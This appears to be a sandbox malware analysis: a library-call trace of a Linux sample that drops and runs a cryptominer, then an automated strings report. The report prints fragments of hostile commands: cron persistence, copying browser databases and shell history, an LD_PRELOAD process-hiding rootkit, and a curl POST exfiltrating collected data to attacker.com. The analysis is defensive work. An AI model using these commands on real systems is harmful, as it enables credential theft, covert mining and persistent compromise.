27 22:53:24.619539 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.620000 __ctype_b_loc() = 0x7d31077f36e0 <0.000280>
27 22:53:24.620423 __ctype_b_loc() = 0x7d31077f36e0 <0.000303>
27 22:53:24.620905 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.621333 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.621806 strchrnul(0x7ffc2f6b3f7d, 61, 5, 61) = 0x7ffc2f6b3f81 <0.000302>
27 22:53:24.622274 strchr("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" <0.000979>
27 22:53:24.623996 strchr("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/sbin:/usr/bin:/sbin:/bin" <0.000889>
27 22:53:24.625357 strchr("/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/bin:/sbin:/bin" <0.000651>
27 22:53:24.626373 strchr("/usr/bin:/sbin:/bin", ':') = ":/sbin:/bin" <0.000538>
27 22:53:24.627181 strchr("/sbin:/bin", ':') = ":/bin" <0.000423>
27 22:53:24.627826 strchr("/bin", ':') = nil <0.000336>
27 22:53:24.628306 __ctype_b_loc() = 0x7d31077f36e0 <0.000306>
27 22:53:24.628757 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.629220 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.629669 __ctype_b_loc() = 0x7d31077f36e0 <0.000317>
27 22:53:24.630139 __ctype_b_loc() = 0x7d31077f36e0 <0.000281>
27 22:53:24.630581 __ctype_b_loc() = 0x7d31077f36e0 <0.000306>
27 22:53:24.631041 __ctype_b_loc() = 0x7d31077f36e0 <0.000336>
27 22:53:24.631546 __ctype_b_loc() = 0x7d31077f36e0 <0.000310>
27 22:53:24.632027 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.632473 __ctype_b_loc() = 0x7d31077f36e0 <0.000280>
27 22:53:24.632932 __ctype_b_loc() = 0x7d31077f36e0 <0.000282>
27 22:53:24.633354 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.633829 __ctype_b_loc() = 0x7d31077f36e0 <0.000278>
27 22:53:24.634260 __ctype_b_loc() = 0x7d31077f36e0 <0.000297>
27 22:53:24.634699 __ctype_b_loc() = 0x7d31077f36e0 <0.000310>
27 22:53:24.635163 malloc(32) = 0x5b4e140a93c0 <0.000276>
27 22:53:24.635594 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.636054 malloc(32) = 0x5b4e140a93f0 <0.000279>
27 22:53:24.636497 strchrnul(0x5b4e124a8020, 61, 7, 61) = 0x5b4e124a8026 <0.000329>
27 22:53:24.636992 __errno_location() = 0x7d31077f36c8 <0.000281>
27 22:53:24.637416 __isoc23_strtoimax(0x5b4e124a8027, 0x7ffc2f6b25c0, 10, 61) = 1 <0.000335>
27 22:53:24.637934 __ctype_b_loc() = 0x7d31077f36e0 <0.000283>
27 22:53:24.638359 getppid() = 24 <0.000357>
27 22:53:24.638886 __vsnprintf_chk(0x5b4e124a8205, 27, 2, -1) = 2 <0.000411>
27 22:53:24.639494 malloc(32) = 0x5b4e140a9420 <0.000376>
27 22:53:24.640061 strchrnul(0x7ffc2f6b3827, 61, 4, 0) = 0x7ffc2f6b382a <0.000310>
27 22:53:24.640539 stat64(0x7ffc2f6b382b, 0x7ffc2f6b26f0, 4, 0) = 0 <0.000426>
27 22:53:24.641118 stat64(0x5b4e124a124f, 0x7ffc2f6b2660, 0x7ffc2f6b26f0, 0x7d310790d3ee) = 0 <0.000416>
27 22:53:24.641694 strdup("/home/app") = 0x5b4e140a9450 <0.000418>
27 22:53:24.642257 __ctype_b_loc() = 0x7d31077f36e0 <0.000300>
27 22:53:24.642698 __ctype_b_loc() = 0x7d31077f36e0 <0.000311>
27 22:53:24.643161 __ctype_b_loc() = 0x7d31077f36e0 <0.000302>
27 22:53:24.643609 strchrnul(0x5b4e124a1194, 61, 0x7d31079a88c0, 0x70612f656d6f682f) = 0x5b4e124a1194 <0.000341>
27 22:53:24.644106 strlen("/home/app") = 9 <0.000404>
27 22:53:24.644641 malloc(14) = 0x5b4e140a9470 <0.000309>
27 22:53:24.645095 __mempcpy_chk(0x5b4e140a9470, 0x5b4e124a1191, 3, 14) = 0x5b4e140a9473 <0.000297>
27 22:53:24.645557 mempcpy(0x5b4e140a9474, 0x5b4e140a9450, 9, 80) = 0x5b4e140a947d <0.000361>
27 22:53:24.646088 geteuid() = 0 <0.000346>
27 22:53:24.646584 getegid() = 0 <0.000360>
27 22:53:24.647086 sigaction(SIGINT, nil, { 0, <>, 0xe, 0x12f6b382b }) = 0 <0.000380>
27 22:53:24.647658 sigfillset(~<31-32>) = 0 <0.000314>
27 22:53:24.648133 sigaction(SIGINT, { 0x5b4e1249bcd0, ~<31-32>, 0xe, 0x12f6b382b }, nil) = 0 <0.000424>
27 22:53:24.648704 sigaction(SIGQUIT, nil, { 0, <>, 0xe, 0x12f6b382b }) = 0 <0.000385>
27 22:53:24.649282 sigfillset(~<31-32>) = 0 <0.000302>
27 22:53:24.649735 sigaction(SIGQUIT, { 0, ~<31-32>, 0xe, 0x12f6b382b }, nil) = 0 <0.000427>
27 22:53:24.650317 sigaction(SIGTERM, nil, { 0, <>, 0xe, 0x12f6b382b }) = 0 <0.000383>
27 22:53:24.650948 sigfillset(~<31-32>) = 0 <0.000286>
27 22:53:24.651385 sigaction(SIGTERM, { 0, ~<31-32>, 0xe, 0x12f6b382b }, nil) = 0 <0.000452>
27 22:53:24.652009 strlen("mkdir -p /opt/.xmr 2>/dev/null") = 30 <0.000740>
27 22:53:24.652928 memcpy(0x5b4e124a84a8, "mkdir -p /opt/.xmr 2>/dev/null\0", 31) = 0x5b4e124a84a8 <0.000482>
27 22:53:24.653585 malloc(136) = 0x5b4e140a9490 <0.000329>
27 22:53:24.654057 strlen("mkdir -p /opt/.xmr 2>/dev/null") = 30 <0.000626>
27 22:53:24.654906 strcmp("mkdir", "for") = 7 <0.000400>
27 22:53:24.655542 strcmp("mkdir", "until") = -8 <0.000470>
27 22:53:24.656162 strcmp("mkdir", "in") = 4 <0.000395>
27 22:53:24.656689 strcmp("mkdir", "then") = -7 <0.000426>
27 22:53:24.657261 __ctype_b_loc() = 0x7d31077f36e0 <0.000298>
27 22:53:24.657706 __ctype_b_loc() = 0x7d31077f36e0 <0.000315>
27 22:53:24.658174 __ctype_b_loc() = 0x7d31077f36e0 <0.000298>
27 22:53:24.658618 __ctype_b_loc() = 0x7d31077f36e0 <0.000307>
27 22:53:24.659077 __ctype_b_loc() = 0x7d31077f36e0 <0.000278>
27 22:53:24.659540 strcspn("mkdir", "\210\203\201\202\204\206\207") = 5 <0.000460>
27 22:53:24.660144 mempcpy(0x5b4e124a85c0, 0x5b4e124a84c8, 6, 6) = 0x5b4e124a85c6 <0.000315>
27 22:53:24.660620 strpbrk(0x5b4e124a85c0, 0x5b4e124a2f7c, 0x5b4e124a83d0, 0x5b4e124a83d0) = 0 <0.000344>
27 22:53:24.661129 strpbrk(0x5b4e124a85c0, 0x5b4e124a28e2, 1, 16) = 0 <0.000303>
27 22:53:24.661605 strchr("mkdir", '/') = nil <0.000384>
27 22:53:24.662135 strcmp("mkdir", "jobs") = 3 <0.000408>
27 22:53:24.662679 strcmp("mkdir", "test") = -7 <0.000424>
27 22:53:24.663247 strcmp("mkdir", "read") = -5 <0.000415>
27 22:53:24.663822 strcmp("mkdir", "printf") = -3 <0.000412>
27 22:53:24.664376 strcmp("mkdir", "local") = 1 <0.000451>
27 22:53:24.664973 strcspn("-p", "\210\203\201\202\204\206\207") = 2 <0.000390>
27 22:53:24.665519 mempcpy(0x5b4e124a85d8, 0x5b4e124a84f0, 3, 3) = 0x5b4e124a85db <0.000331>
27 22:53:24.666007 strpbrk(0x5b4e124a85d8, 0x5b4e124a2f7c, 0x5b4e124a83d0, 0x5b4e124a83d0) = 0 <0.000298>
27 22:53:24.666472 strpbrk(0x5b4e124a85d8, 0x5b4e124a28e2, 8, 2) = 0 <0.000323>
27 22:53:24.666952 strcspn("/opt/.xmr", "\210\203\201\202\204\206\207") = 9 <0.000465>
27 22:53:24.667570 mempcpy(0x5b4e124a85f0, 0x5b4e124a8518, 10, 10) = 0x5b4e124a85fa <0.000319>
27 22:53:24.668038 strpbrk(0x5b4e124a85f0, 0x5b4e124a2f7c, 0x5b4e124a83d0, 0x5b4e124a83d0) = 0 <0.000299>
27 22:53:24.668503 strpbrk(0x5b4e124a85f0, 0x5b4e124a28e2, 1, 16) = 0 <0.000359>
27 22:53:24.669234 malloc(16) = 0x5b4e140a9520 <0.000308>
27 22:53:24.669682 strcspn("/dev/null", "\210\203\201\202\204\206\207") = 9 <0.000494>
27 22:53:24.670320 mempcpy(0x5b4e124a8638, 0x5b4e124a8570, 10, 10) = 0x5b4e124a8642 <0.000416>
27 22:53:24.670928 malloc(48) = 0x5b4e140a9540 <0.000447>
27 22:53:24.671568 _setjmp(0x7ffc2f6b24e0, 3, 0xfffffffefffffffe, 0x5b4e140a9570) = 0 <0.000341>
27 22:53:24.672080 open64("/dev/null", 577, 0666) = 3 <0.005286>
27 22:53:24.677589 fcntl(2, 0, 10, 2) = 10 <0.000454>
27 22:53:24.678193 close(2) = 0 <0.000370>
27 22:53:24.678694 fcntl(10, 2, 1, 0x7d310790c724) = 0 <0.000400>
27 22:53:24.679250 dup2(3, 2) = 2 <0.000395>
27 22:53:24.679801 close(3) = 0 <0.000345>
27 22:53:24.680289 strchr("mkdir", '/') = nil <0.000371>
27 22:53:24.680824 strcmp("mkdir", "jobs") = 3 <0.000395>
27 22:53:24.681362 strcmp("mkdir", "test") = -7 <0.000445>
27 22:53:24.681955 strcmp("mkdir", "read") = -5 <0.000390>
27 22:53:24.682503 strcmp("mkdir", "printf") = -3 <0.000445>
27 22:53:24.683092 strcmp("mkdir", "local") = 1 <0.000426>
27 22:53:24.683653 strcspn("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 15 <0.000997>
27 22:53:24.684815 strlen("mkdir") = 5 <0.000347>
27 22:53:24.685305 mempcpy(0x5b4e124a8658, 0x7ffc2f6b3f82, 15, 1472) = 0x5b4e124a8667 <0.000326>
27 22:53:24.685805 strcpy(0x5b4e124a8668, "mkdir") = 0x5b4e124a8668 <0.000503>
27 22:53:24.686577 stat64(0x5b4e124a8658, 0x7ffc2f6b24f0, 0x5b4e124a866d, 0) = 0xffffffff <0.000508>
27 22:53:24.687243 strcspn("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 14 <0.000838>
27 22:53:24.688228 strlen("mkdir") = 5 <0.000631>
27 22:53:24.689014 mempcpy(0x5b4e124a8658, 0x7ffc2f6b3f92, 14, 1472) = 0x5b4e124a8666 <0.000307>
27 22:53:24.689489 strcpy(0x5b4e124a8667, "mkdir") = 0x5b4e124a8667 <0.000382>
27 22:53:24.690016 stat64(0x5b4e124a8658, 0x7ffc2f6b24f0, 0x5b4e124a866c, 0) = 0xffffffff <0.000382>
27 22:53:24.690563 strcspn("/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 9 <0.000656>
27 22:53:24.691364 strlen("mkdir") = 5 <0.000358>
27 22:53:24.691884 mempcpy(0x5b4e124a8658, 0x7ffc2f6b3fa1, 9, 1472) = 0x5b4e124a8661 <0.000301>
27 22:53:24.692335 strcpy(0x5b4e124a8662, "mkdir") = 0x5b4e124a8662 <0.000374>
27 22:53:24.692874 stat64(0x5b4e124a8658, 0x7ffc2f6b24f0, 0x5b4e124a8667, 0) = 0xffffffff <0.000374>
27 22:53:24.693402 strcspn("/usr/bin:/sbin:/bin", "%:") = 8 <0.000572>
27 22:53:24.694116 strlen("mkdir") = 5 <0.000357>
27 22:53:24.694607 mempcpy(0x5b4e124a8658, 0x7ffc2f6b3fab, 8, 1472) = 0x5b4e124a8660 <0.000323>
27 22:53:24.695085 strcpy(0x5b4e124a8661, "mkdir") = 0x5b4e124a8661 <0.000345>
27 22:53:24.695588 stat64(0x5b4e124a8658, 0x7ffc2f6b24f0, 0x5b4e124a8666, 0) = 0 <0.000405>
27 22:53:24.696145 strlen("mkdir") = 5 <0.000363>
27 22:53:24.696644 malloc(29) = 0x5b4e140a9580 <0.000305>
27 22:53:24.697094 __strcpy_chk(0x5b4e140a9593, 0x5b4e124a85c0, 10, 0x5b4e140a95a0) = 0x5b4e140a9593 <0.000298>
27 22:53:24.697556 realloc(0, 160) = 0x5b4e140a95b0 <0.000312>
27 22:53:24.698015 sigfillset(~<31-32>) = 0 <0.000276>
27 22:53:24.698464 sigprocmask(SIG_UNBLOCK, ~<31-32>, nil) = 0 <0.000414>
27 22:53:24.699035 vfork(2, 0x7ffc2f6b2520, 0, 0x7d3107899f48
28 22:53:24.700145 <... vfork resumed> ) = 0 <0.001030>
28 22:53:24.700383 sigsetmask(0, 0, 0, 0x7d310790674c) = 0x7ffbfeef <0.000804>
28 22:53:24.701544 malloc(512) = 0x5b4e140a9660 <0.000663>
28 22:53:24.702488 memcpy(0x5b4e140a9668, "u?k/\374\177\0\0F8k/\374\177\0\058k/\374\177\0\0\336?k/\374\177\0\0j?k/\374\177\0\0}?k/\374\177\0\0Q8k/\374\177\0\0\277?k/\374\177\0\0p\224\n\024N[\0\0", 72) = 0x5b4e140a9668 <0.000977>
28 22:53:24.703756 strchr("mkdir", '/') = nil <0.000609>
28 22:53:24.704640 strcspn("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 15 <0.001300>
28 22:53:24.706232 strlen("mkdir") = 5 <0.000642>
28 22:53:24.707177 mempcpy(0x5b4e140a96b8, 0x7ffc2f6b3f82, 15, 1472) = 0x5b4e140a96c7 <0.000697>
28 22:53:24.708178 strcpy(0x5b4e140a96c8, "mkdir") = 0x5b4e140a96c8 <0.000751>
28 22:53:24.709191 strcspn("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 14 <0.001102>
28 22:53:24.710582 strlen("mkdir") = 5 <0.000619>
28 22:53:24.711479 mempcpy(0x5b4e140a96b8, 0x7ffc2f6b3f92, 14, 1472) = 0x5b4e140a96c6 <0.000506>
28 22:53:24.712338 strcpy(0x5b4e140a96c7, "mkdir") = 0x5b4e140a96c7 <0.000610>
28 22:53:24.713196 strcspn("/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 9 <0.000923>
28 22:53:24.714373 strlen("mkdir") = 5 <0.000607>
28 22:53:24.715226 mempcpy(0x5b4e140a96b8, 0x7ffc2f6b3fa1, 9, 1472) = 0x5b4e140a96c1 <0.000529>
28 22:53:24.716035 strcpy(0x5b4e140a96c2, "mkdir") = 0x5b4e140a96c2 <0.000585>
28 22:53:24.716878 strcspn("/usr/bin:/sbin:/bin", "%:") = 8 <0.000793>
28 22:53:24.717938 strlen("mkdir") = 5 <0.000585>
28 22:53:24.718822 mempcpy(0x5b4e140a96b8, 0x7ffc2f6b3fab, 8, 1472) = 0x5b4e140a96c0 <0.000493>
28 22:53:24.719606 strcpy(0x5b4e140a96c1, "mkdir") = 0x5b4e140a96c1 <0.000581>
28 22:53:24.720431 execve(0x5b4e140a96b8, 0x5b4e124a8618, 0x5b4e140a9668, 0
28 22:53:24.721867 --- Called exec() ---
27 22:53:24.723824 <... vfork resumed> ) = 28 <0.024727>
27 22:53:24.724030 sigsetmask(0, 0, 0, 0x7d310790674c) = 0x7ffbfeef <0.000534>
27 22:53:24.724804 wait3(0x7ffc2f6b244c, 0, 0, 0
28 22:53:24.758679 strrchr("mkdir", '/') = nil <0.000522>
28 22:53:24.759305 setlocale(LC_ALL, "") = "C" <0.000395>
28 22:53:24.759906 bindtextdomain("coreutils", "/usr/share/locale") = "/usr/share/locale" <0.000610>
28 22:53:24.760871 textdomain("coreutils") = "coreutils" <0.000391>
28 22:53:24.761541 __cxa_atexit(0x5c1daf7b9550, 0, 0x5c1daf7be008, 0) = 0 <0.000362>
28 22:53:24.762060 getopt_long(3, 0x7ffd3602aeb8, "pm:vZ", 0x5c1daf7bd9a0, nil) = 112 <0.000407>
28 22:53:24.762615 getopt_long(3, 0x7ffd3602aeb8, "pm:vZ", 0x5c1daf7bd9a0, nil) = -1 <0.000403>
28 22:53:24.763172 umask(00) = 022 <0.000369>
28 22:53:24.763675 umask(022) = 00 <0.000373>
28 22:53:24.764234 mkdir("/opt", 0777) = -1 <0.000474>
28 22:53:24.764869 __errno_location() = 0x7eca828226a0 <0.000281>
28 22:53:24.765317 chdir("/opt") = 0 <0.000432>
28 22:53:24.765934 mkdir(".xmr", 0777) = 0 <0.000920>
28 22:53:24.767060 __fpending(0x7eca82ac35c0, 0, 1, 1) = 0 <0.000320>
28 22:53:24.767548 fileno(0x7eca82ac35c0) = 1 <0.000324>
28 22:53:24.768018 __freading(0x7eca82ac35c0, 0, 1, 1) = 0 <0.000330>
28 22:53:24.768598 __freading(0x7eca82ac35c0, 0, 0, 1) = 0 <0.000541>
28 22:53:24.769303 fflush(0x7eca82ac35c0) = 0 <0.000455>
28 22:53:24.769954 fclose(0x7eca82ac35c0) = 0 <0.000362>
28 22:53:24.770478 __fpending(0x7eca82ac34e0, 0, 0x7eca82ac0e00, 0) = 0 <0.000345>
28 22:53:24.770980 fileno(0x7eca82ac34e0) = 2 <0.000286>
28 22:53:24.771403 __freading(0x7eca82ac34e0, 0, 0x7eca82ac0e00, 0) = 0 <0.000323>
28 22:53:24.771912 __freading(0x7eca82ac34e0, 0, 0, 0) = 0 <0.000297>
28 22:53:24.772352 fflush(0x7eca82ac34e0) = 0 <0.000302>
28 22:53:24.772818 fclose(0x7eca82ac34e0) = 0 <0.000356>
28 22:53:24.773713 +++ exited (status 0) +++
27 22:53:24.773966 --- SIGCHLD (Child exited) ---
27 22:53:24.774162 <... wait3 resumed> ) = 28 <0.049336>
27 22:53:24.774315 wait3(0x7ffc2f6b244c, 1, 0, 0) = 0xffffffff <0.000418>
27 22:53:24.774927 dup2(10, 2) = 2 <0.000416>
27 22:53:24.775494 close(10) = 0 <0.000378>
27 22:53:24.776015 free(0x5b4e140a9540) = <0.000279>
27 22:53:24.776431 free(0x5b4e140a9520) = <0.000299>
27 22:53:24.776892 free(0x5b4e140a9660) = <0.000276>
27 22:53:24.777316 free(0x5b4e140a9490) = <0.000303>
27 22:53:24.777754 _setjmp(0x7ffc2f6b26d0, 0x5b4e140a9480, 0x5b4e140a9, 0x5b4e124a84a8) = 0 <0.000351>
27 22:53:24.778260 _setjmp(0x7ffc2f6b26d0, 0, 0x2f200241a395ba91, 0x5b4e124a84a8) = 0 <0.000317>
27 22:53:24.778728 _exit(0
27 22:53:24.779399 +++ exited (status 0) +++
24 22:53:24.779737 --- SIGCHLD (Child exited) ---
24 22:53:24.779931 <... system resumed> ) = 0 <0.208156>
24 22:53:24.780105 malloc(863496) = 0x7b61b3f0d010 <0.000419>
24 22:53:24.784552 fopen("/tmp/.xmrig/miner", "wb") = 0x599c52d956b0 <0.000838>
24 22:53:24.785558 fwrite("\177ELF\002\001\001\003", 1, 863496, 0x599c52d956b0) = 863496 <0.002186>
24 22:53:24.787924 fclose(0x599c52d956b0) = 0 <0.000676>
24 22:53:24.788896 free(0x7b61b3f0d010) = <0.000580>
24 22:53:24.789627 chmod("/tmp/.xmrig/miner", 0755) = 0 <0.000674>
24 22:53:24.790434 fork() = 29 <0.000941>
24 22:53:24.791584 waitpid(29, 0x7ffcf4dc5a7c, 0
29 22:53:24.792043 <... fork resumed> ) = 0 <0.001559>
29 22:53:24.792261 execl(0x7ffcf4dc5aa0, 0x599c52ba5044, 0x599c52ba5041, 0
29 22:53:24.793410 --- Called exec() ---
|
==================================================================================================== MALWARE BEHAVIOR ANALYSIS REPORT Generated: 2025-11-17 22:53:26 ==================================================================================================== |
MD5: SHA1: Sha256: SSDeep: File Entropy: 6.2642 Sections: 31
Next I analyzed the strings output, and the following strings came back as suspicious (note that several hits are truncated or overlapping fragments, and entries such as .shstrtab, .rela.plt, .plt.got and .got.plt are ordinary ELF section names rather than indicators on their own):
This analysis shows strings matching suspicious patterns. Active patterns (11 loaded from interesting_patterns.json): - URLs - Executables - Registry Keys - Registry Paths - Network Paths - IP Addresses - Email Addresses - Linux Paths - Sensitive Keywords - SQL Commands - Shell Commands[+] 7-bit ASCII (s) - Found 15 interesting strings:
- /tmp/.xmATUSH
- /.bash_h
- #!/bin/b
- n/bash
- _ZZZ\ZZX\ZZ^\ZZ\ZZR\ZZP\ZZV\ZZT\ZZJ\ZZH\ZZN\ZZL\ZZB\ZZ@\ZZF\ZZD\ZZz\ZZx\ZZ~\ZZ|\ZZr\ZZp\ZZv\ZZt\ZZj\ZZh\ZZn\ZZl\ZZb\ZZ`\ZZf\ZZd\ZZ
- ~WZZZZZq[ZZZZZZZZZZZZZZ[ZZZZZZZZZZZZZZZZZZZZZZZ/tmp/.xmrig/mine/tmp/.xmrig/conf{"pool":"pool.minexmr.com:4444","wallet":"attackacker_wallet"}
- (crontab -l 2>/dev/null; echo "@reboot /tmp/.xmrig/miner") | cro/tmp/.collected
- /tmp/.collected/lected/history_
- /.mozilla/firefo -name "*.sqlite" -exec cp {} /tmp/.collected/browsers/ ; 2>/de/.config/google-/tmp/.rootkit_maLD_PRELOAD rootkit would be installed at /lib/.libprocesshider.sConfiguration: /etc/ld.so.preloa/tmp/.callback.s# Network callbacurl -X POST -d @/tmp/.collected http://attacker.com:8080/exfil il 2>/dev/null
- chmod +x /tmp/.cmp/.callback.sh
- ev/null; echo "0 * * * * /tmp/.callback.sh") | ch") | crontab -
- .shstrtab
- .rela.plt
- .plt.got
- .got.plt
[+] 8-bit ASCII (S) - Found 15 interesting strings:
- H�/tmp/.xmATUSH���
- H�/.bash_h�/
- H�#!/bin/b�#
- H�n/bash
- _ZZ:_ZZ8_ZZ>_ZZ<_ZZ2_ZZ0_ZZ6_ZZ4_ZZ*_ZZ(_ZZ._ZZ,_ZZ"_ZZ _ZZ&_ZZ$_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZ�_ZZZ\ZZX\ZZ^\ZZ\ZZR\ZZP\ZZV\ZZT\ZZJ\ZZH\ZZN\ZZL\ZZB\ZZ@\ZZF\ZZD\ZZz\ZZx\ZZ~\ZZ|\ZZr\ZZp\ZZv\ZZt\ZZj\ZZh\ZZn\ZZl\ZZb\ZZ`\ZZf\ZZd\ZZ 6.ZZZZZ�
WZZZZZjZZZZZZZZZZZZZZZRZZZZZZZZZZZZZZZx[ZZ[ZZZjZZZZZZZZZZZZZZZ�WZZZZZ}ZZZZZZZZZZZZZZZ[ZZZZZZZ[ZZZZZZZ[ZZZYZZZZZZZZZZZZZZZZZZZ�~WZZZZZq[ZZZZZZZZZZZZZZ[ZZZZZZZZZZZZZZZZZZZZZZZ/tmp/.xmrig/mine/tmp/.xmrig/conf{"pool":"pool.minexmr.com:4444","wallet":"attackacker_wallet"}- (crontab -l 2>/dev/null; echo "@reboot /tmp/.xmrig/miner") | cro/tmp/.collected
- /tmp/.collected/lected/history_
- /.mozilla/firefo -name "*.sqlite" -exec cp {} /tmp/.collected/browsers/ ; 2>/de/.config/google-/tmp/.rootkit_maLD_PRELOAD rootkit would be installed at /lib/.libprocesshider.sConfiguration: /etc/ld.so.preloa/tmp/.callback.s# Network callbacurl -X POST -d @/tmp/.collected http://attacker.com:8080/exfil il 2>/dev/null
- chmod +x /tmp/.cmp/.callback.sh
- ev/null; echo "0 * * * * /tmp/.callback.sh") | ch") | crontab -
- .shstrtab
- .rela.plt
- .plt.got
- .got.plt
[+] Total interesting strings found: 30